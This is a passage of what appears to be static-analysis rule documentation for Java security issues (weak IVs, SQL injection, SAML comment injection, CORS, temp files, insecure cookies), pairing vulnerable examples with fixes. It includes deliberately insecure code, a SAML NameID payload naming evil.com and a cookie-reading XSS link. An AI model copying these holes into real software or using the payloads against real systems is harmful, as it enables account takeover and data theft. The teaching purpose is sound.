    .usersByUsernameQuery("SELECT * FROM users WHERE username = ?"); // Noncompliant; default uses plain-text

  // OR
  auth.userDetailsService(...); // Noncompliant; default uses plain-text
  // OR
  auth.userDetailsService(...).passwordEncoder(new StandardPasswordEncoder()); // Noncompliant
}

Compliant solution

@Autowired
public void configureGlobal(AuthenticationManagerBuilder auth, DataSource dataSource) throws Exception {
  auth.jdbcAuthentication()
    .dataSource(dataSource)
    .usersByUsernameQuery("Select * from users where username=?")
    .passwordEncoder(new BCryptPasswordEncoder());

  // or
  auth.userDetailsService(null).passwordEncoder(new BCryptPasswordEncoder());
}

Resources

java:S6432

Why is this an issue?

When encrypting data with Counter (CTR) derived block cipher modes of operation, it is essential not to reuse the same initialization vector (IV) with a given key, such IV is called a "nonce" (number used only once). Galois/Counter (GCM) and Counter with Cipher Block Chaining-Message Authentication Code (CCM) are both CTR-based modes of operation.

An attacker, who has knowledge of one plaintext (original content) and ciphertext (encrypted content) pair, is able to retrieve the corresponding plaintext of any other ciphertext generated with the same IV and key. It also drastically decreases the key recovery computational complexity by downgrading it to a simpler polynomial root-finding problem.

When using GCM, NIST recommends a 96 bit length nonce using a 'Deterministic' approach or at least 96 bits using a 'Random Bit Generator (RBG)'. The 'Deterministic' construction involves a counter, which increments per encryption process. The 'RBG' construction, as the name suggests, generates the nonce using a random bit generator. Collision probabilities (nonce-key pair reuse) using the 'RBG-based' approach require a shorter key rotation period, 2^32 maximum invocations per key.

Noncompliant code example

public void encrypt(byte[] key, byte[] ptxt) {
    byte[] bytesIV = "7cVgr5cbdCZV".getBytes("UTF-8"); // The initialization vector is a static value

    GCMParameterSpec gcmSpec    = new GCMParameterSpec(128, nonce); // The initialization vector is configured here
    SecretKeySpec keySpec       = new SecretKeySpec(key, "AES");

    Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
    cipher.init(Cipher.ENCRYPT_MODE, keySpec, iv);  // Noncompliant
}

Compliant solution

public void encrypt(byte[] key, byte[] ptxt) {
    SecureRandom random = new SecureRandom();
    byte[] bytesIV = new byte[12];
    random.nextBytes(bytesIV); // Random 96 bit IV

    GCMParameterSpec gcmSpec    = new GCMParameterSpec(128, nonce);
    SecretKeySpec keySpec       = new SecretKeySpec(key, "AES");

    Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
    cipher.init(Cipher.ENCRYPT_MODE, keySpec, iv);
}

Resources

java:S2077

Formatted SQL queries can be difficult to maintain, debug and can increase the risk of SQL injection when concatenating untrusted values into the query. However, this rule doesn’t detect SQL injections (unlike rule S3649), the goal is only to highlight complex/formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Sensitive Code Example

public User getUser(Connection con, String user) throws SQLException {

  Statement stmt1 = null;
  Statement stmt2 = null;
  PreparedStatement pstmt;
  try {
    stmt1 = con.createStatement();
    ResultSet rs1 = stmt1.executeQuery("GETDATE()"); // No issue; hardcoded query

    stmt2 = con.createStatement();
    ResultSet rs2 = stmt2.executeQuery("select FNAME, LNAME, SSN " +
                 "from USERS where UNAME=" + user);  // Sensitive

    pstmt = con.prepareStatement("select FNAME, LNAME, SSN " +
                 "from USERS where UNAME=" + user);  // Sensitive
    ResultSet rs3 = pstmt.executeQuery();

    //...
}

public User getUserHibernate(org.hibernate.Session session, String data) {

  org.hibernate.Query query = session.createQuery(
            "FROM students where fname = " + data);  // Sensitive
  // ...
}

Compliant Solution

public User getUser(Connection con, String user) throws SQLException {

  Statement stmt1 = null;
  PreparedStatement pstmt = null;
  String query = "select FNAME, LNAME, SSN " +
                 "from USERS where UNAME=?"
  try {
    stmt1 = con.createStatement();
    ResultSet rs1 = stmt1.executeQuery("GETDATE()");

    pstmt = con.prepareStatement(query);
    pstmt.setString(1, user);  // Good; PreparedStatements escape their inputs.
    ResultSet rs2 = pstmt.executeQuery();

    //...
  }
}

public User getUserHibernate(org.hibernate.Session session, String data) {

  org.hibernate.Query query =  session.createQuery("FROM students where fname = ?");
  query = query.setParameter(0,data);  // Good; Parameter binding escapes all input

  org.hibernate.Query query2 =  session.createQuery("FROM students where fname = " + data); // Sensitive
  // ...

See

java:S4347

Why is this an issue?

The java.security.SecureRandom class provides a strong random number generator (RNG) appropriate for cryptography. However, seeding it with a constant or another predictable value will weaken it significantly. In general, it is much safer to rely on the seed provided by the SecureRandom implementation.

This rule raises an issue when SecureRandom.setSeed() or SecureRandom(byte[]) are called with a seed that is either one of:

  • a constant
  • the system time

Noncompliant code example

SecureRandom sr = new SecureRandom();
sr.setSeed(123456L); // Noncompliant
int v = sr.next(32);

sr = new SecureRandom("abcdefghijklmnop".getBytes("us-ascii")); // Noncompliant
v = sr.next(32);

Compliant solution

SecureRandom sr = new SecureRandom();
int v = sr.next(32);

Resources

java:S5679

Why is this an issue?

In 2018, Duo Security found a new vulnerability class that affects SAML-based single sign-on (SSO) systems and this led to the following vulnerabilities being disclosed: CVE-2017-11427, CVE-2017-11428, CVE-2017-11429, CVE-2017-11430, CVE-2018-0489, CVE-2018-7340.

From a specially crafted <SAMLResponse> file, an attacker having already access to the SAML system with his own account can bypass the authentication mechanism and be authenticated as another user.

This is due to the fact that SAML protocol rely on XML format and how the underlying XML parser interprets XML comments.

If an attacker manage to change the <NameID> field identifying the authenticated user with XML comments, he can exploit the vulnerability.

Here is an example of a potential payload:

<SAMLResponse>
  [...]
  <Subject>
    <NameID>admin@domain.com<!---->.evil.com</NameID>
  </Subject>
  [...]
</SAMLResponse>

The attacker will manage to generate a valid <SAMLResponse> content with the account "admin@domain.com.evil.com". He will modify it with XML comments to finally be authenticated as "admin@domain.com". To prevent this vulnerability on application using Spring Security SAML relying on OpenSAML2, XML comments should be ignored thanks to the property ignoreComments set to true.

Noncompliant code example

import org.opensaml.xml.parse.BasicParserPool;
import org.opensaml.xml.parse.ParserPool;
import org.opensaml.xml.parse.StaticBasicParserPool;

public ParserPool parserPool() {
  StaticBasicParserPool staticBasicParserPool = new StaticBasicParserPool();
  staticBasicParserPool.setIgnoreComments(false); // Noncompliant: comments are not ignored during parsing opening the door to exploit the vulnerability
  return staticBasicParserPool;
}
public ParserPool parserPool() {
  BasicParserPool basicParserPool = new BasicParserPool();
  basicParserPool.setIgnoreComments(false); // Noncompliant
  return basicParserPool;
}

Compliant solution

public ParserPool parserPool() {
  return new StaticBasicParserPool(); // Compliant: "ignoreComments" is set to "true" in StaticBasicParserPool constructor
}
public ParserPool parserPool() {
  return new BasicParserPool();  // Compliant: "ignoreComments" is set to "true" in BasicParserPool constructor
}

Resources

java:S5689

Disclosing technology fingerprints allows an attacker to gather information about the technologies used to develop the web application and to perform relevant security assessments more quickly (like the identification of known vulnerable components).

Ask Yourself Whether

  • The x-powered-by HTTP header or similar is used by the application.
  • Technologies used by the application are confidential and should not be easily guessed.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

It’s recommended to not disclose technologies used on a website, with x-powered-by HTTP header for example.

In addition, it’s better to completely disable this HTTP header rather than setting it a random value.

Sensitive Code Example

public ResponseEntity<String> testResponseEntity() {
  HttpHeaders responseHeaders = new HttpHeaders();
  responseHeaders.set("x-powered-by", "myproduct"); // Sensitive

  return new ResponseEntity<String>("foo", responseHeaders, HttpStatus.CREATED);
}

Compliant Solution

Don’t use x-powered-by or Server HTTP header or any other means disclosing fingerprints of the application.

See

java:S5322

Android applications can receive broadcasts from the system or other applications. Receiving intents is security-sensitive. For example, it has led in the past to the following vulnerabilities:

Receivers can be declared in the manifest or in the code to make them context-specific. If the receiver is declared in the manifest Android will start the application if it is not already running once a matching broadcast is received. The receiver is an entry point into the application.

Other applications can send potentially malicious broadcasts, so it is important to consider broadcasts as untrusted and to limit the applications that can send broadcasts to the receiver.

Permissions can be specified to restrict broadcasts to authorized applications. Restrictions can be enforced by both the sender and receiver of a broadcast. If permissions are specified when registering a broadcast receiver, then only broadcasters who were granted this permission can send a message to the receiver.

This rule raises an issue when a receiver is registered without specifying any broadcast permission.

Ask Yourself Whether

  • The data extracted from intents is not sanitized.
  • Intents broadcast is not restricted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Restrict the access to broadcasted intents. See the Android documentation for more information.

Sensitive Code Example

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.IntentFilter;
import android.os.Build;
import android.os.Handler;
import android.support.annotation.RequiresApi;

public class MyIntentReceiver {

    @RequiresApi(api = Build.VERSION_CODES.O)
    public void register(Context context, BroadcastReceiver receiver,
                         IntentFilter filter,
                         String broadcastPermission,
                         Handler scheduler,
                         int flags) {
        context.registerReceiver(receiver, filter); // Sensitive
        context.registerReceiver(receiver, filter, flags); // Sensitive

        // Broadcasting intent with "null" for broadcastPermission
        context.registerReceiver(receiver, filter, null, scheduler); // Sensitive
        context.registerReceiver(receiver, filter, null, scheduler, flags); // Sensitive
    }
}

Compliant Solution

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.IntentFilter;
import android.os.Build;
import android.os.Handler;
import android.support.annotation.RequiresApi;

public class MyIntentReceiver {

    @RequiresApi(api = Build.VERSION_CODES.O)
    public void register(Context context, BroadcastReceiver receiver,
                         IntentFilter filter,
                         String broadcastPermission,
                         Handler scheduler,
                         int flags) {

        context.registerReceiver(receiver, filter, broadcastPermission, scheduler);
        context.registerReceiver(receiver, filter, broadcastPermission, scheduler, flags);
    }
}

See

java:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, it has led to the following vulnerabilities:

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see examples bellow). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such API will make sure:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
    • The file will be destroyed as soon as it is closed

Sensitive Code Example

new File("/tmp/myfile.txt"); // Sensitive
Paths.get("/tmp/myfile.txt"); // Sensitive

java.io.File.createTempFile("prefix", "suffix"); // Sensitive, will be in the default temporary-file directory.
java.nio.file.Files.createTempDirectory("prefix"); // Sensitive, will be in the default temporary-file directory.
Map<String, String> env = System.getenv();
env.get("TMP"); // Sensitive

Compliant Solution

new File("/myDirectory/myfile.txt");  // Compliant

File.createTempFile("prefix", "suffix", new File("/mySecureDirectory"));  // Compliant

if(SystemUtils.IS_OS_UNIX) {
  FileAttribute<Set<PosixFilePermission>> attr = PosixFilePermissions.asFileAttribute(PosixFilePermissions.fromString("rwx------"));
  Files.createTempFile("prefix", "suffix", attr); // Compliant
}
else {
  File f = Files.createTempFile("prefix", "suffix").toFile();  // Compliant
  f.setReadable(true, true);
  f.setWritable(true, true);
  f.setExecutable(true, true);
}

See

java:S5445

Temporary files are considered insecurely created when the file existence check is performed separately from the actual file creation. Such a situation can occur when creating temporary files using normal file handling functions or when using dedicated temporary file handling functions that are not atomic.

Why is this an issue?

Creating temporary files in a non-atomic way introduces race condition issues in the application’s behavior. Indeed, a third party can create a given file between when the application chooses its name and when it creates it.

In such a situation, the application might use a temporary file that it does not entirely control. In particular, this file’s permissions might be different than expected. This can lead to trust boundary issues.

What is the potential impact?

Attackers with control over a temporary file used by a vulnerable application will be able to modify it in a way that will affect the application’s logic. By changing this file’s Access Control List or other operating system-level properties, they could prevent the file from being deleted or emptied. They may also alter the file’s content before or while the application uses it.

Depending on why and how the affected temporary files are used, the exploitation of a race condition in an application can have various consequences. They can range from sensitive information disclosure to more serious application or hosting infrastructure compromise.

Information disclosure

Because attackers can control the permissions set on temporary files and prevent their removal, they can read what the application stores in them. This might be especially critical if this information is sensitive.

For example, an application might use temporary files to store users' session-related information. In such a case, attackers controlling those files can access session-stored information. This might allow them to take over authenticated users' identities and entitlements.

Attack surface extension

An application might use temporary files to store technical data for further reuse or as a communication channel between multiple components. In that case, it might consider those files part of the trust boundaries and use their content without additional security validation or sanitation. In such a case, an attacker controlling the file content might use it as an attack vector for further compromise.

For example, an application might store serialized data in temporary files for later use. In such a case, attackers controlling those files' content can change it in a way that will lead to an insecure deserialization exploitation. It might allow them to execute arbitrary code on the application hosting server and take it over.

How to fix it

Code examples

The following code example is vulnerable to a race condition attack because it creates a temporary file using an unsafe API function.

Noncompliant code example

import java.io.File;
import java.io.IOException;

protected void Example() throws IOException {
    File tempDir;
    tempDir = File.createTempFile("", ".");
    tempDir.delete();
    tempDir.mkdir();  // Noncompliant
}

Compliant solution

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

protected void Example() throws IOException {
    Path tempPath = Files.createTempDirectory("");
    File tempDir = tempPath.toFile();
}

How does this work?

Applications should create temporary files so that no third party can read or modify their content. It requires that the files' name, location, and permissions are carefully chosen and set. This can be achieved in multiple ways depending on the applications' technology stacks.

Use a secure API function

Temporary files handling APIs generally provide secure functions to create temporary files. In most cases, they operate in an atomical way, creating and opening a file with a unique and unpredictable name in a single call. Those functions can often be used to replace less secure alternatives without requiring important development efforts.

Here, the example compliant code uses the safer Files.createTempDirectory function to manage the creation of temporary directories.

Strong security controls

Temporary files can be created using unsafe functions and API as long as strong security controls are applied. Non-temporary file-handling functions and APIs can also be used for that purpose.

In general, applications should ensure that attackers can not create a file before them. This turns into the following requirements when creating the files:

  • Files should be created in a non-public directory.
  • File names should be unique.
  • File names should be unpredictable. They should be generated using a cryptographically secure random generator.
  • File creation should fail if a target file already exists.

Moreover, when possible, it is recommended that applications destroy temporary files after they have finished using them.

Resources

Documentation

  • OWASP - Insecure Temporary File

Standards

  • OWASP - Top 10 2021 - A01:2021 - Broken Access Control
  • OWASP - Top 10 2017 - A9:2017 - Using Components with Known Vulnerabilities
  • MITRE - CWE-377: Insecure Temporary File
  • MITRE - CWE-379: Creation of Temporary File in Directory with Incorrect Permissions
java:S5324

Storing data locally is a common task for mobile applications. Such data includes files among other things. One convenient way to store files is to use the external file storage which usually offers a larger amount of disc space compared to internal storage.

Files created on the external storage are globally readable and writable. Therefore, a malicious application having the permissions WRITE_EXTERNAL_STORAGE or READ_EXTERNAL_STORAGE could try to read sensitive information from the files that other applications have stored on the external storage.

External storage can also be removed by the user (e.g when based on SD card) making the files unavailable to the application.

Ask Yourself Whether

Your application uses external storage to:

  • store files that contain sensitive data.
  • store files that are not meant to be shared with other application.
  • store files that are critical for the application to work.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use internal storage whenever possible as the system prevents other apps from accessing this location.
  • Only use external storage if you need to share non-sensitive files with other applications.
  • If your application has to use the external storage to store sensitive data, make sure it encrypts the files using EncryptedFile.
  • Data coming from external storage should always be considered untrusted and should be validated.
  • As some external storage can be removed, make sure to never store files on it that are critical for the usability of your application.

Sensitive Code Example

import android.content.Context;

public class AccessExternalFiles {

    public void accessFiles(Context context) {
        context.getExternalFilesDir(null); // Sensitive
    }
}

Compliant Solution

import android.content.Context;

public class AccessExternalFiles {

    public void accessFiles(Context context) {
        context.getFilesDir();
    }
}

See

java:S6418

Because it is easy to extract strings from an application source code or binary, secrets should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Secrets should be stored outside of the source code in a configuration file or a management service for secrets.

This rule detects variables/fields having a name matching a list of words (secret, token, credential, auth, api[_.-]?key) being assigned a pseudorandom hard-coded value. The pseudorandomness of the hard-coded value is based on its entropy and the probability to be human-readable. The randomness sensibility can be adjusted if needed. Lower values will detect less random values, raising potentially more false positives.

Ask Yourself Whether

  • The secret allows access to a sensitive component like a database, a file storage, an API, or a service.
  • The secret is used in a production environment.
  • Application re-distribution is required before updating the secret.

There would be a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the secret in a configuration file that is not pushed to the code repository.
  • Use your cloud provider’s service for managing secrets.
  • If a secret has been disclosed through the source code: revoke it and create a new one.

Sensitive Code Example

private static final String MY_SECRET = "47828a8dd77ee1eb9dde2d5e93cb221ce8c32b37";

public static void main(String[] args) {
  MyClass.callMyService(MY_SECRET);
}

Compliant Solution

Using AWS Secrets Manager:

import software.amazon.awssdk.services.secretsmanager.model.GetSecretValueRequest;
import software.amazon.awssdk.services.secretsmanager.model.GetSecretValueResponse;

public static void main(String[] args) {
  SecretsManagerClient secretsClient = ...
  MyClass.doSomething(secretsClient, "MY_SERVICE_SECRET");
}

public static void doSomething(SecretsManagerClient secretsClient, String secretName) {
  GetSecretValueRequest valueRequest = GetSecretValueRequest.builder()
    .secretId(secretName)
    .build();

  GetSecretValueResponse valueResponse = secretsClient.getSecretValue(valueRequest);
  String secret = valueResponse.secretString();
  // do something with the secret
  MyClass.callMyService(secret);
}

Using Azure Key Vault Secret:

import com.azure.identity.DefaultAzureCredentialBuilder;

import com.azure.security.keyvault.secrets.SecretClient;
import com.azure.security.keyvault.secrets.SecretClientBuilder;
import com.azure.security.keyvault.secrets.models.KeyVaultSecret;

public static void main(String[] args) throws InterruptedException, IllegalArgumentException {
  String keyVaultName = System.getenv("KEY_VAULT_NAME");
  String keyVaultUri = "https://" + keyVaultName + ".vault.azure.net";

  SecretClient secretClient = new SecretClientBuilder()
    .vaultUrl(keyVaultUri)
    .credential(new DefaultAzureCredentialBuilder().build())
    .buildClient();

  MyClass.doSomething(secretClient, "MY_SERVICE_SECRET");
}

public static void doSomething(SecretClient secretClient, String secretName) {
  KeyVaultSecret retrievedSecret = secretClient.getSecret(secretName);
  String secret = retrievedSecret.getValue(),

  // do something with the secret
  MyClass.callMyService(secret);
}

See

java:S2053

This vulnerability increases the likelihood that attackers are able to compute the cleartext of password hashes.

Why is this an issue?

During the process of password hashing, an additional component, known as a "salt," is often integrated to bolster the overall security. This salt, acting as a defensive measure, primarily wards off certain types of attacks that leverage pre-computed tables to crack passwords.

However, potential risks emerge when the salt is deemed insecure. This can occur when the salt is consistently the same across all users or when it is too short or predictable. In scenarios where users share the same password and salt, their password hashes will inevitably mirror each other. Similarly, a short salt heightens the probability of multiple users unintentionally having identical salts, which can potentially lead to identical password hashes. These identical hashes streamline the process for potential attackers to recover clear-text passwords. Thus, the emphasis on implementing secure, unique, and sufficiently lengthy salts in password-hashing functions is vital.

What is the potential impact?

Despite best efforts, even well-guarded systems might have vulnerabilities that could allow an attacker to gain access to the hashed passwords. This could be due to software vulnerabilities, insider threats, or even successful phishing attempts that give attackers the access they need.

Once the attacker has these hashes, they will likely attempt to crack them using a couple of methods. One is brute force, which entails trying every possible combination until the correct password is found. While this can be time-consuming, having the same salt for all users or a short salt can make the task significantly easier and faster.

If multiple users have the same password and the same salt, their password hashes would be identical. This means that if an attacker successfully cracks one hash, they have effectively cracked all identical ones, granting them access to multiple accounts at once.

A short salt, while less critical than a shared one, still increases the odds of different users having the same salt. This might create clusters of password hashes with identical salt that can then be attacked as explained before.

With short salts, the probability of a collision between two users' passwords and salts couple might be low depending on the salt size. The shorter the salt, the higher the collision probability. In any case, using longer, cryptographically secure salt should be preferred.

How to fix it in Java SE

Code examples

The following code contains examples of hard-coded salts.

Noncompliant code example

import javax.crypto.spec.PBEParameterSpec;

public void hash() {
    byte[] salt = "salty".getBytes();
    PBEParameterSpec cipherSpec = new PBEParameterSpec(salt, 10000); // Noncompliant
}

Compliant solution

import java.security.SecureRandom;
import javax.crypto.spec.PBEParameterSpec;

public void hash() {
    SecureRandom random = new SecureRandom();
    byte[] salt = new byte[16];
    random.nextBytes(salt);

    PBEParameterSpec cipherSpec = new PBEParameterSpec(salt, 10000);
}

How does this work?

This code ensures that each user’s password has a unique salt value associated with it. It generates a salt randomly and with a length that provides the required security level. It uses a salt length of at least 16 bytes (128 bits), as recommended by industry standards.

Here, the compliant code example ensures the salt is random and has a sufficient length by calling the nextBytes method from the SecureRandom class with a salt buffer of 16 bytes. This class implements a cryptographically secure pseudo-random number generator.

Resources

Standards

  • OWASP Top 10:2021 A02:2021 - Cryptographic Failures
  • OWASP - Top 10 2017 - A03:2017 - Sensitive Data Exposure
  • CWE - CWE-759: Use of a One-Way Hash without a Salt
  • CWE - CWE-760: Use of a One-Way Hash with a Predictable Salt
java:S5320

In Android applications, broadcasting intents is security-sensitive. For example, it has led in the past to the following vulnerability:

By default, broadcasted intents are visible to every application, exposing all sensitive information they contain.

This rule raises an issue when an intent is broadcasted without specifying any "receiver permission".

Ask Yourself Whether

  • The intent contains sensitive information.
  • Intent reception is not restricted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Restrict the access to broadcasted intents. See Android documentation for more information.

Sensitive Code Example

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Build;
import android.os.Bundle;
import android.os.Handler;
import android.os.UserHandle;
import android.support.annotation.RequiresApi;

public class MyIntentBroadcast {
    @RequiresApi(api = Build.VERSION_CODES.JELLY_BEAN_MR1)
    public void broadcast(Intent intent, Context context, UserHandle user,
                          BroadcastReceiver resultReceiver, Handler scheduler, int initialCode,
                          String initialData, Bundle initialExtras,
                          String broadcastPermission) {
        context.sendBroadcast(intent); // Sensitive
        context.sendBroadcastAsUser(intent, user); // Sensitive

        // Broadcasting intent with "null" for receiverPermission
        context.sendBroadcast(intent, null); // Sensitive
        context.sendBroadcastAsUser(intent, user, null); // Sensitive
        context.sendOrderedBroadcast(intent, null); // Sensitive
        context.sendOrderedBroadcastAsUser(intent, user, null, resultReceiver,
                scheduler, initialCode, initialData, initialExtras); // Sensitive
    }
}

Compliant Solution

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Build;
import android.os.Bundle;
import android.os.Handler;
import android.os.UserHandle;
import android.support.annotation.RequiresApi;

public class MyIntentBroadcast {
    @RequiresApi(api = Build.VERSION_CODES.JELLY_BEAN_MR1)
    public void broadcast(Intent intent, Context context, UserHandle user,
                          BroadcastReceiver resultReceiver, Handler scheduler, int initialCode,
                          String initialData, Bundle initialExtras,
                          String broadcastPermission) {

        context.sendBroadcast(intent, broadcastPermission);
        context.sendBroadcastAsUser(intent, user, broadcastPermission);
        context.sendOrderedBroadcast(intent, broadcastPermission);
        context.sendOrderedBroadcastAsUser(intent, user,broadcastPermission, resultReceiver,
                scheduler, initialCode, initialData, initialExtras);
    }
}

See

java:S4036

When executing an OS command and unless you specify the full path to the executable, then the locations in your application’s PATH environment variable will be searched for the executable. That search could leave an opening for an attacker if one of the elements in PATH is a directory under his control.

Ask Yourself Whether

  • The directories in the PATH environment variable may be defined by not trusted entities.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Fully qualified/absolute path should be used to specify the OS command to execute.

Sensitive Code Example

The full path of the command is not specified and thus the executable will be searched in all directories listed in the PATH environment variable:

Runtime.getRuntime().exec("make");  // Sensitive
Runtime.getRuntime().exec(new String[]{"make"});  // Sensitive

ProcessBuilder builder = new ProcessBuilder("make");  // Sensitive
builder.command("make");  // Sensitive

Compliant Solution

The command is defined by its full path:

Runtime.getRuntime().exec("/usr/bin/make");  // Compliant
Runtime.getRuntime().exec(new String[]{"~/bin/make"});  // Compliant

ProcessBuilder builder = new ProcessBuilder("./bin/make");  // Compliant
builder.command("../bin/make");  // Compliant
builder.command(Arrays.asList("..\bin\make", "-j8")); // Compliant

builder = new ProcessBuilder(Arrays.asList(".\make"));  // Compliant
builder.command(Arrays.asList("C:\bin\make", "-j8"));  // Compliant
builder.command(Arrays.asList("\\SERVER\bin\make"));  // Compliant

See

java:S5247

To reduce the risk of cross-site scripting attacks, templating systems, such as Twig, Django, Smarty, Groovy's template engine, allow configuration of automatic variable escaping before rendering templates. When escape occurs, characters that make sense to the browser (eg: <a>) will be transformed/replaced with escaped/sanitized values (eg: & lt;a& gt; ).

Auto-escaping is not a magic feature to annihilate all cross-site scripting attacks, it depends on the strategy applied and the context, for example a "html auto-escaping" strategy (which only transforms html characters into html entities) will not be relevant when variables are used in a html attribute because ':' character is not escaped and thus an attack as below is possible:

<a href="{{ myLink }}">link</a> // myLink = javascript:alert(document.cookie)
<a href="javascript:alert(document.cookie)">link</a> // JS injection (XSS attack)

Ask Yourself Whether

  • Templates are used to render web content and
    • dynamic variables in templates come from untrusted locations or are user-controlled inputs
    • there is no local mechanism in place to sanitize or validate the inputs.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable auto-escaping by default and continue to review the use of inputs in order to be sure that the chosen auto-escaping strategy is the right one.

Sensitive Code Example

With JMustache by samskivert:

Mustache.compiler().escapeHTML(false).compile(template).execute(context); // Sensitive
Mustache.compiler().withEscaper(Escapers.NONE).compile(template).execute(context); // Sensitive

With Freemarker:

freemarker.template.Configuration configuration = new freemarker.template.Configuration();
configuration.setAutoEscapingPolicy(DISABLE_AUTO_ESCAPING_POLICY); // Sensitive

Compliant Solution

With JMustache by samskivert:

Mustache.compiler().compile(template).execute(context); // Compliant, auto-escaping is enabled by default
Mustache.compiler().escapeHTML(true).compile(template).execute(context); // Compliant

With Freemarker. See "setAutoEscapingPolicy" documentation for more details.

freemarker.template.Configuration configuration = new freemarker.template.Configuration();
configuration.setAutoEscapingPolicy(ENABLE_IF_DEFAULT_AUTO_ESCAPING_POLICY); // Compliant

See

java:S5122

Having a permissive Cross-Origin Resource Sharing policy is security-sensitive. It has led in the past to the following vulnerabilities:

Same origin policy in browsers prevents, by default and for security-reasons, a javascript frontend to perform a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers in response, called CORS, that act like directives for the browser and change the access control policy / relax the same origin policy.

Ask Yourself Whether

  • You don’t trust the origin specified, example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • Access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input like origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use * wildcard nor blindly return the Origin header content without any checks).

Sensitive Code Example

Java servlet framework:

@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    resp.setHeader("Content-Type", "text/plain; charset=utf-8");
    resp.setHeader("Access-Control-Allow-Origin", "*"); // Sensitive
    resp.setHeader("Access-Control-Allow-Credentials", "true");
    resp.setHeader("Access-Control-Allow-Methods", "GET");
    resp.getWriter().write("response");
}

Spring MVC framework:

@CrossOrigin // Sensitive
@RequestMapping("")
public class TestController {
    public String home(ModelMap model) {
        model.addAttribute("message", "ok ");
        return "view";
    }
}
CorsConfiguration config = new CorsConfiguration();
config.addAllowedOrigin("*"); // Sensitive
config.applyPermitDefaultValues(); // Sensitive
class Insecure implements WebMvcConfigurer {
  @Override
  public void addCorsMappings(CorsRegistry registry) {
    registry.addMapping("/**")
      .allowedOrigins("*"); // Sensitive
  }
}

User-controlled origin:

public ResponseEntity<String> userControlledOrigin(@RequestHeader("Origin") String origin) {
  HttpHeaders responseHeaders = new HttpHeaders();
  responseHeaders.add("Access-Control-Allow-Origin", origin); // Sensitive

  return new ResponseEntity<>("content", responseHeaders, HttpStatus.CREATED);
}

Compliant Solution

Java Servlet framework:

@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    resp.setHeader("Content-Type", "text/plain; charset=utf-8");
    resp.setHeader("Access-Control-Allow-Origin", "trustedwebsite.com"); // Compliant
    resp.setHeader("Access-Control-Allow-Credentials", "true");
    resp.setHeader("Access-Control-Allow-Methods", "GET");
    resp.getWriter().write("response");
}

Spring MVC framework:

@CrossOrigin("trustedwebsite.com") // Compliant
@RequestMapping("")
public class TestController {
    public String home(ModelMap model) {
        model.addAttribute("message", "ok ");
        return "view";
    }
}
CorsConfiguration config = new CorsConfiguration();
config.addAllowedOrigin("http://domain2.com"); // Compliant
class Safe implements WebMvcConfigurer {
  @Override
  public void addCorsMappings(CorsRegistry registry) {
    registry.addMapping("/**")
      .allowedOrigins("safe.com"); // Compliant
  }
}

User-controlled origin validated with an allow-list:

public ResponseEntity<String> userControlledOrigin(@RequestHeader("Origin") String origin) {
  HttpHeaders responseHeaders = new HttpHeaders();
  if (trustedOrigins.contains(origin)) {
    responseHeaders.add("Access-Control-Allow-Origin", origin);
  }

  return new ResponseEntity<>("content", responseHeaders, HttpStatus.CREATED);
}

See

java:S2092

When a cookie is protected with the secure attribute set to true it will not be send by the browser over an unencrypted HTTP request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.

Ask Yourself Whether

  • the cookie is for instance a session-cookie not designed to be sent over non-HTTPS communication.
  • it’s not sure that the website contains mixed content or not (ie HTTPS everywhere or not)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to use HTTPs everywhere so setting the secure flag to true should be the default behaviour when creating cookies.
  • Set the secure flag to true for session-cookies.

Sensitive Code Example

If you create a security-sensitive cookie in your JAVA code:

Cookie c = new Cookie(COOKIENAME, sensitivedata);
c.setSecure(false);  // Sensitive: a security-ensitive cookie is created with the secure flag set to false

By default the secure flag is set to false:

